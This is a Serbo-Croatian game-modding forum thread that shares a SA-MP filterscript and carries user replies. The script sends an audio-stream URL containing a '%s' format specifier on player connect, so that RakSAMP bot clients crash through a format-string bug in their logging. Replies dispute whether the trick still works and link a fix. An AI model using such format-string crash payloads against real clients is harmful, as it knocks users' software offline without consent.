Tip: FS
Slike ili Video: http://prntscr.com/kq94yy
Opis i dodatne informacije: Nadam se da ce nekom posluziti
Download link: DOLE
Scan link: //
Credits: SlowARG
Detaljnije:
http://forum.sa-mp.com/showthread.php?t=657987
#include <a_samp>
#define FILTERSCRIPT
#define _RAKCRASH_HIDE // Hide "%s" in "real URL".
/********************************************************************************
* How it works? *
* RakSAMP crashes when passing string format specifier in Log() function. *
* File: netrpc.cpp on ScrPlayAudioStream function: *
* Log("[AUDIO_STREAM] %s", szURL); --> if szURL contains %s, it will crash *
* Since SA-MP client doesn't crash passing null string inside audio stream *
* we can abuse this to crash invalid clients such as RakSAMP. *
*********************************************************************************/
public OnPlayerConnect(playerid)
{
#if defined _RAKCRASH_HIDE
PlayAudioStreamForPlayer(playerid, "https://dl.dropboxusercontent.com/s/ac4oqi08gtiuzb0/intro%samp.mp3?dl=0"); // you can use any url containing %s or %20s or something else. It doesn't need to be a valid URL.
#else
PlayAudioStreamForPlayer(playerid, "%s");
#endif
StopAudioStreamForPlayer(playerid);
return 1;
}
Ovo je fixano istog trenutka Äim je FS izaÅ¡la, ne radi nit je ikada radilo ( radilo po sata od kada je izaÅ¡la fs )
GJ! :)
Ja sam uspio uć preko 3 akaunta sa jednog kompa. 8)
Citat: ᴀʀá´á´€É¢á´‡á´...á´É´ poslato Septembar 04, 2018, 05:56:33 PRE PODNE
Ovo je fixano istog trenutka Äim je FS izaÅ¡la, ne radi nit je ikada radilo ( radilo po sata od kada je izaÅ¡la fs )
Meni crasha rak samp
Citat: Captain Foux poslato Septembar 04, 2018, 05:59:39 PRE PODNE
GJ! :)
Ja sam uspio uć preko 3 akaunta sa jednog kompa. 8)
Ma mozes preko 100 acc sa 1 kompa,zato imaju systemi da sa 1 ip 1 acc
Logicno da ce crashati kad neamte veze sa C nit sa raknetom
https://github.com/P3ti/RakSAMP/pull/23